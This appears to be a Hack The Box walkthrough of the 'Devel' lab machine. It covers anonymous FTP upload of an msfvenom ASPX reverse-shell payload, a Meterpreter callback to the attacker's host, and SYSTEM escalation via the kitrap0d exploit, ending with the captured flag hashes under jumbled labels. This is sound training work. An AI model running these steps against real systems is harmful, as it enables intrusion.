HTB | Devel
Walkthrough
Time to Root Machine: ~30min
Write-up Date(s): 4/19/2021
Last Edited: 4/19/2021
Assuming we have connection to HTB's network already, let's go ahead and scan 10.10.10.5's ports with
Nmap:┌──(root💀kali)-[~] └─# nmap -p- -A -T4 10.10.10.5 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 11:31 EDT Nmap scan report for 10.10.10.5 Host is up (0.069s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 04-23-21 12:59PM 0 file | 04-23-21 01:12PM 3 file.asp | 04-23-21 01:12PM 3 file.aspx | 03-17-17 05:37PM 689 iisstart.htm | 04-23-21 01:15PM 38359 shell.asp | 04-23-21 01:15PM 2737 shell.aspx | 04-23-21 01:10PM <DIR> UCUZGULSZF |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 45.94 ms 10.10.16.1 2 98.26 ms 10.10.10.5 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 145.53 seconds
Alright, so a few important things to point out are port
21 [ftp] & port 80 [http]. Digging a little further into the port 21, we can see that FTP allows for anonymous login, which is a huge plus.Let’s go ahead and start with port 21, which is the FTP port and login anonymously:
┌──(root💀kali)-[~] └─# ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> pwd 257 "/" is current directory. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 02:06AM <DIR> aspnet_client 03-17-17 05:37PM 689 iisstart.htm 03-17-17 05:37PM 184946 welcome.png
So, we didn't find much in the FTP server, but we have a
DIR, or in other words a directory, labelled 'aspnet_client'. This could prove helpful, so let's go ahead and dig a little deeper into the directory:ftp> cd aspnet_client 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 02:06AM <DIR> system_web 226 Transfer complete. ftp> cd system_web 250 CWD command successful. ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection. 03-18-17 02:06AM <DIR> 2_0_50727 226 Transfer complete. ftp> cd 2_0_50727 250 CWD command successful. ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection. 226 Transfer complete.
So, it looks like we potentially found an
aspnet_client version, which is 2_0_50727. This could prove handy in the future, so we will keep it in our notes.Moving onto to Port 80, we can navigate to the webpage and see if we can find anything interesting:
Not much to look at, but we can gather some information in regards to the server version, even though it was already found on the nmap scan:
Server: Microsoft-IIS/7.5. We will note this down, as well, for later use, if needed.Now that we have some information to go off of,
aspnet_client version 2.0.50727 & Web Server as Microsoft-IIS/7.5, Let's begin by seeing if there is any common vulnerabilities within these two programs:┌──(root💀kali)-[~]
└─# searchsploit .net 2.0 148 ⨯ 2 ⚙
----------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------- ---------------------------------
Alt-N WebAdmin 2.0.x - Remote File Disclosure | cgi/remote/22542.txt
Alt-N WebAdmin 2.0.x - Remote File Viewing | cgi/remote/22541.txt
gps-server.net GPS Tracking Software < 3.1 - Multiple Vulnerabilities | php/webapps/43431.txt
Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities | windows/remote/30281.txt
Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow (PoC) | windows/dos/3254.py
----------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[~]
└─# searchsploit IIS 7.5 2 ⚙
----------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC) | windows/dos/15803.py
----------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
As you can see, there isn’t much to go off of when using
searchsploit. After attempting a Google search, there was nothing that popped out, either. Let's circle back around to the FTP port and see if we can do anything interesting within it, such as writing/creating a file and putting it on the server:┌──(root💀kali)-[~] └─# ftp 10.10.10.5 148 ⨯ 3 ⚙ Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put test.txt local: test.txt remote: test.txt 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 10 bytes sent in 0.00 secs (271.2674 kB/s) ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 02:06AM <DIR> aspnet_client 03-17-17 05:37PM 689 iisstart.htm 04-23-21 07:02PM 10 test.txt 03-17-17 05:37PM 184946 welcome.png 226 Transfer complete.
Wow, it's as easy as that! Looks like we can use the
put command and drop the test.txt file we created on our local machine onto the server. So, what's next? We can create a file that contains a reverse shell that is compatible with the server and place it on the server. So, what type of file would be compatible? Most likely an .asp/.aspx file. Let's go ahead and whip up a file with a reverse shell real quick:┌──(root💀kali)-[~] └─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f aspx > shell.aspx 148 ⨯ 5 ⚙ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of aspx file: 2860 bytes
We have created a file labelled
'shell.aspx', and this file contains a meterpreter reverse shell that we can drop onto the server we are attacking using FTP.Now that we have created the file, let’s drop it onto the server using FTP:
┌──(root💀kali)-[~] └─# ftp 10.10.10.5 5 ⚙ Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put shell.aspx local: shell.aspx remote: shell.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 2897 bytes sent in 0.00 secs (47.6344 MB/s) ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 02:06AM <DIR> aspnet_client 03-17-17 05:37PM 689 iisstart.htm 04-23-21 07:06PM 2897 shell.aspx 04-23-21 07:02PM 10 test.txt 03-17-17 05:37PM 184946 welcome.png 226 Transfer complete.
And there we go! As you can see, we now have the
test.txt & shell.aspx on the server. Let's go ahead and test that shell using a netcat [nc] listener:┌──(root💀kali)-[~] └─# nc -nvlp 4444 10.10.10.5 148 ⨯ 6 ⚙ listening on [any] 4444 ... connect to [10.10.16.159] from (UNKNOWN) [10.10.10.5] 49165
We got a connection! We can now use
Metasploit's Multihandler exploit and get that reverse shell going:┌──(root💀kali)-[~]
└─# msfconsole 6 ⚙
[!] The following modules could not be loaded!../
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.0.40-dev ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.16.159
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.159:4444
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.16.159:4444 -> 10.10.10.5:49167) at 2021-04-23 12:05:11 -0400
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > getuid
Server username: IIS APPPOOL\Web
Alright, our reverse shell is up and running. Let’s see if we can capture those flags without privesc:
meterpreter > dir Listing: c:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2009-07-13 22:36:15 -0400 $Recycle.Bin 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Documents and Settings 40777/rwxrwxrwx 0 dir 2009-07-13 22:37:05 -0400 PerfLogs 40555/r-xr-xr-x 4096 dir 2009-07-13 22:37:05 -0400 Program Files 40777/rwxrwxrwx 4096 dir 2009-07-13 22:37:05 -0400 ProgramData 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:30 -0400 Recovery 40777/rwxrwxrwx 8192 dir 2017-03-17 07:09:34 -0400 System Volume Information 40555/r-xr-xr-x 4096 dir 2009-07-13 22:37:05 -0400 Users 40777/rwxrwxrwx 16384 dir 2009-07-13 22:37:05 -0400 Windows 100777/rwxrwxrwx 24 fil 2009-07-13 22:04:04 -0400 autoexec.bat 100666/rw-rw-rw- 10 fil 2009-07-13 22:04:04 -0400 config.sys 40777/rwxrwxrwx 4096 dir 2017-03-17 10:37:31 -0400 inetpub 0000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys meterpreter > cd Users meterpreter > ls Listing: c:\Users ================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 8192 dir 2017-03-17 19:16:43 -0400 Administrator 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 All Users 40777/rwxrwxrwx 8192 dir 2017-03-17 19:06:26 -0400 Classic .NET AppPool 40555/r-xr-xr-x 8192 dir 2009-07-13 22:37:05 -0400 Default 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Default User 40555/r-xr-xr-x 4096 dir 2009-07-13 22:37:05 -0400 Public 40777/rwxrwxrwx 8192 dir 2017-03-17 10:17:37 -0400 babis 100666/rw-rw-rw- 174 fil 2009-07-14 00:41:57 -0400 desktop.ini meterpreter > cd babis [-] stdapi_fs_chdir: Operation failed: Access is denied. meterpreter > cd Administrator [-] stdapi_fs_chdir: Operation failed: Access is denied.
We have failed to access even the user folder, called
babis. That's OK! Our next option is to see if we can do some local privelege escalation. We can use Metasploit's suggester tool to discover if any common privesc exploits are available to use on this server:meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > search suggester Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester msf6 exploit(multi/handler) > use 0 msf6 post(multi/recon/local_exploit_suggester) > options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf6 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.5 - Collecting local exploits for x86/windows... [*] 10.10.10.5 - 37 exploit checks are being tried... [+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed
Wow, looks like there is quite a bit that could potentially work. Let's try the famous
kitrap0d exploit, first:msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/ms10_015_kitrap0d) > options Module options (exploit/windows/local/ms10_015_kitrap0d): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.0.2.15 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 2K SP4 - Windows 7 (x86) msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1 SESSION => 1 msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0 LHOST => tun0 msf6 exploit(windows/local/ms10_015_kitrap0d) > run [*] Started reverse TCP handler on 10.10.16.159:4444 [*] Launching notepad to host the exploit... [+] Process 1484 launched. [*] Reflectively injecting the exploit DLL into 1484... [*] Injecting exploit into 1484 ... [*] Exploit injected. Injecting payload into 1484... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (175174 bytes) to 10.10.10.5 [*] Meterpreter session 2 opened (10.10.16.159:4444 -> 10.10.10.5:49168) at 2021-04-23 12:11:54 -0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
We are now logged into the server as
NT AUTHORITY\SYSTEM, or in other words, a Windows Server Administrator account. Let's go ahead and grab those flags:meterpreter > ls Listing: c:\Users ================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 8192 dir 2017-03-17 19:16:43 -0400 Administrator 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 All Users 40777/rwxrwxrwx 8192 dir 2017-03-17 19:06:26 -0400 Classic .NET AppPool 40555/r-xr-xr-x 8192 dir 2009-07-13 22:37:05 -0400 Default 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Default User 40555/r-xr-xr-x 4096 dir 2009-07-13 22:37:05 -0400 Public 40777/rwxrwxrwx 8192 dir 2017-03-17 10:17:37 -0400 babis 100666/rw-rw-rw- 174 fil 2009-07-14 00:41:57 -0400 desktop.ini meterpreter > cd babis/Desktop meterpreter > cat user.txt.txt 9ecdd6a3aedf24b41562fea70f4cb3e8 meterpreter > cd ../../ meterpreter > ls Listing: c:\Users ================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 8192 dir 2017-03-17 19:16:43 -0400 Administrator 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 All Users 40777/rwxrwxrwx 8192 dir 2017-03-17 19:06:26 -0400 Classic .NET AppPool 40555/r-xr-xr-x 8192 dir 2009-07-13 22:37:05 -0400 Default 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Default User 40555/r-xr-xr-x 4096 dir 2009-07-13 22:37:05 -0400 Public 40777/rwxrwxrwx 8192 dir 2017-03-17 10:17:37 -0400 babis 100666/rw-rw-rw- 174 fil 2009-07-14 00:41:57 -0400 desktop.ini meterpreter > cd Administrator/Desktop meterpreter > cat root.txt e621a0b5041708797c4fc4728bc72b4b
ROOT FLAG:
USER [babis] FLAG:
e621a0b5041708797c4fc4728bc72b4bUSER [babis] FLAG:
9ecdd6a3aedf24b41562fea70f4cb3e8